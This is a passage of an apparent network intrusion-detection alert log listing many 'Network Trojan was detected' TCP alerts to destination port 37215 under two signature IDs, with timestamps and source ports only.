          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356294
          SID:2835222
          Source Port:51576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.738786
          SID:2829579
          Source Port:59560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351977
          SID:2835222
          Source Port:47348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.470567
          SID:2835222
          Source Port:49598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732695
          SID:2829579
          Source Port:34268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.808526
          SID:2829579
          Source Port:40746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.005771
          SID:2829579
          Source Port:51508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.448545
          SID:2829579
          Source Port:60638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.158996
          SID:2835222
          Source Port:35244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463381
          SID:2835222
          Source Port:39098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.832959
          SID:2829579
          Source Port:49418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112487
          SID:2835222
          Source Port:53102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600450
          SID:2829579
          Source Port:57800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.888087
          SID:2829579
          Source Port:58830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176711
          SID:2829579
          Source Port:39576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741698
          SID:2829579
          Source Port:37156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020868
          SID:2829579
          Source Port:40944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113364
          SID:2835222
          Source Port:47330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175524
          SID:2829579
          Source Port:44180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.157801
          SID:2835222
          Source Port:45566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266127
          SID:2835222
          Source Port:44926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788322
          SID:2835222
          Source Port:57018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112375
          SID:2829579
          Source Port:50626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044202
          SID:2829579
          Source Port:41124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.035108
          SID:2835222
          Source Port:49738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861019
          SID:2835222
          Source Port:44052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730667
          SID:2829579
          Source Port:41396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.600919
          SID:2829579
          Source Port:59784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.108048
          SID:2835222
          Source Port:42974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242567
          SID:2835222
          Source Port:60220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179875
          SID:2829579
          Source Port:56184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403893
          SID:2829579
          Source Port:51536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732326
          SID:2835222
          Source Port:34714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782811
          SID:2835222
          Source Port:44048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.737008
          SID:2829579
          Source Port:51952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.734140
          SID:2829579
          Source Port:34662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.550777
          SID:2829579
          Source Port:55646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.126588
          SID:2829579
          Source Port:56606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517321
          SID:2829579
          Source Port:51066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554580
          SID:2835222
          Source Port:45592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.786644
          SID:2835222
          Source Port:41724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.022233
          SID:2829579
          Source Port:34338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.545960
          SID:2835222
          Source Port:52990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.129786
          SID:2835222
          Source Port:57796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467688
          SID:2829579
          Source Port:34406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.819369
          SID:2829579
          Source Port:35590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.109885
          SID:2829579
          Source Port:52054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.786546
          SID:2829579
          Source Port:56076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112112
          SID:2829579
          Source Port:41300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.014870
          SID:2829579
          Source Port:39916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173134
          SID:2829579
          Source Port:47774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262865
          SID:2829579
          Source Port:49532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.555407
          SID:2835222
          Source Port:41628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.306555
          SID:2829579
          Source Port:59076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259791
          SID:2835222
          Source Port:56972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.668066
          SID:2835222
          Source Port:33162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160846
          SID:2829579
          Source Port:51082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.806139
          SID:2835222
          Source Port:44030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.513832
          SID:2829579
          Source Port:34542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114519
          SID:2835222
          Source Port:41248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.163272
          SID:2829579
          Source Port:35364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.014678
          SID:2829579
          Source Port:38372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158611
          SID:2829579
          Source Port:53746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.269831
          SID:2835222
          Source Port:41026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.038125
          SID:2829579
          Source Port:46214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.163830
          SID:2829579
          Source Port:48378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733828
          SID:2829579
          Source Port:52942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601865
          SID:2829579
          Source Port:39388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.546146
          SID:2829579
          Source Port:54848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733497
          SID:2835222
          Source Port:43824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.131786
          SID:2835222
          Source Port:47596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.445879
          SID:2835222
          Source Port:54074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517018
          SID:2835222
          Source Port:52532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734966
          SID:2829579
          Source Port:46832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.860905
          SID:2835222
          Source Port:50424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.799389
          SID:2835222
          Source Port:54378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.603162
          SID:2835222
          Source Port:56398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670262
          SID:2835222
          Source Port:47122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599343
          SID:2835222
          Source Port:48998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780998
          SID:2835222
          Source Port:33912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.240454
          SID:2835222
          Source Port:36972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.894823
          SID:2829579
          Source Port:45580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.894951
          SID:2835222
          Source Port:44646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108475
          SID:2835222
          Source Port:37248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.396889
          SID:2835222
          Source Port:34126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.267690
          SID:2829579
          Source Port:38238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.795229
          SID:2835222
          Source Port:44762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670097
          SID:2835222
          Source Port:45474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743686
          SID:2829579
          Source Port:41414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671011
          SID:2829579
          Source Port:56232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266008
          SID:2835222
          Source Port:38792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.151338
          SID:2835222
          Source Port:51890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108364
          SID:2829579
          Source Port:34378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897415
          SID:2829579
          Source Port:33552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.147788
          SID:2835222
          Source Port:58592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729246
          SID:2829579
          Source Port:57220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.745437
          SID:2829579
          Source Port:47820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160621
          SID:2835222
          Source Port:57894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.510533
          SID:2829579
          Source Port:41582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.884463
          SID:2835222
          Source Port:45578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.791917
          SID:2835222
          Source Port:58672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159328
          SID:2835222
          Source Port:52908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.109279
          SID:2829579
          Source Port:48558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.396852
          SID:2835222
          Source Port:53742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.151198
          SID:2829579
          Source Port:60618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272159
          SID:2835222
          Source Port:52180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896202
          SID:2829579
          Source Port:41272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.070974
          SID:2835222
          Source Port:42180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.816416
          SID:2829579
          Source Port:50990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731247
          SID:2835222
          Source Port:34772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.111879
          SID:2829579
          Source Port:41404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466218
          SID:2835222
          Source Port:54698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.818614
          SID:2829579
          Source Port:51146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444338
          SID:2835222
          Source Port:59180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.663715
          SID:2835222
          Source Port:48734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.448921
          SID:2835222
          Source Port:59046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673546
          SID:2835222
          Source Port:59538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.703980
          SID:2829579
          Source Port:38898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449096
          SID:2829579
          Source Port:40086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.303222
          SID:2829579
          Source Port:43498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.862572
          SID:2829579
          Source Port:45358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.789130
          SID:2835222
          Source Port:47774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.884623
          SID:2829579
          Source Port:55374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.175903
          SID:2835222
          Source Port:41820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599786
          SID:2829579
          Source Port:47896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.810602
          SID:2829579
          Source Port:40516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.037351
          SID:2835222
          Source Port:55886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731620
          SID:2829579
          Source Port:56836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.663572
          SID:2835222
          Source Port:53984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746049
          SID:2829579
          Source Port:59474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.812621
          SID:2829579
          Source Port:39456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.110246
          SID:2829579
          Source Port:43302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.111827
          SID:2829579
          Source Port:53614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.035598
          SID:2829579
          Source Port:52340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.273085
          SID:2835222
          Source Port:42412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.741927
          SID:2835222
          Source Port:58822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.786493
          SID:2835222
          Source Port:52342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406179
          SID:2829579
          Source Port:44462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551041
          SID:2835222
          Source Port:36828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.126785
          SID:2835222
          Source Port:38138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160222
          SID:2829579
          Source Port:50912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.275336
          SID:2835222
          Source Port:46790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.075165
          SID:2835222
          Source Port:42422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670384
          SID:2835222
          Source Port:57066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160823
          SID:2835222
          Source Port:51948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.109026
          SID:2829579
          Source Port:49526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.899223
          SID:2835222
          Source Port:42730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.237381
          SID:2835222
          Source Port:42346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.157359
          SID:2829579
          Source Port:44866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.153937
          SID:2835222
          Source Port:60032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.015930
          SID:2829579
          Source Port:40256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.268576
          SID:2829579
          Source Port:57014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178985
          SID:2835222
          Source Port:49208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.128028
          SID:2835222
          Source Port:37414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270073
          SID:2829579
          Source Port:41892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.895685
          SID:2829579
          Source Port:42680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.799464
          SID:2829579
          Source Port:39158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.887011
          SID:2829579
          Source Port:55008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.748134
          SID:2829579
          Source Port:42522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.067519
          SID:2835222
          Source Port:57910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.820849
          SID:2835222
          Source Port:52508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178959
          SID:2835222
          Source Port:53902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.736606
          SID:2829579
          Source Port:60082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239777
          SID:2835222
          Source Port:50520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.180273
          SID:2829579
          Source Port:45954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115305
          SID:2829579
          Source Port:46360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.827760
          SID:2835222
          Source Port:57510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.837177
          SID:2829579
          Source Port:38498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746842
          SID:2829579
          Source Port:58520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.510342
          SID:2829579
          Source Port:35368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.271987
          SID:2835222
          Source Port:53272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.820778
          SID:2829579
          Source Port:55814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353280
          SID:2835222
          Source Port:36962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.018909
          SID:2829579
          Source Port:51156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.025871
          SID:2829579
          Source Port:50410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174866
          SID:2829579
          Source Port:40036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242327
          SID:2835222
          Source Port:48028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517711
          SID:2835222
          Source Port:56320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.109030
          SID:2829579
          Source Port:50544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706328
          SID:2829579
          Source Port:46578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.894203
          SID:2835222
          Source Port:50552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242889
          SID:2835222
          Source Port:54112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.510022
          SID:2829579
          Source Port:47316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.804311
          SID:2829579
          Source Port:52354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.811575
          SID:2829579
          Source Port:33010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019509
          SID:2829579
          Source Port:39116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740887
          SID:2835222
          Source Port:39110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.784443
          SID:2829579
          Source Port:46326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159629
          SID:2829579
          Source Port:43636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.087779
          SID:2835222
          Source Port:35026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780209
          SID:2835222
          Source Port:60262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.460842
          SID:2835222
          Source Port:46032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.067771
          SID:2829579
          Source Port:55316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351122
          SID:2829579
          Source Port:53610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.062731
          SID:2829579
          Source Port:40412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549804
          SID:2829579
          Source Port:56266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.015748
          SID:2829579
          Source Port:33524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
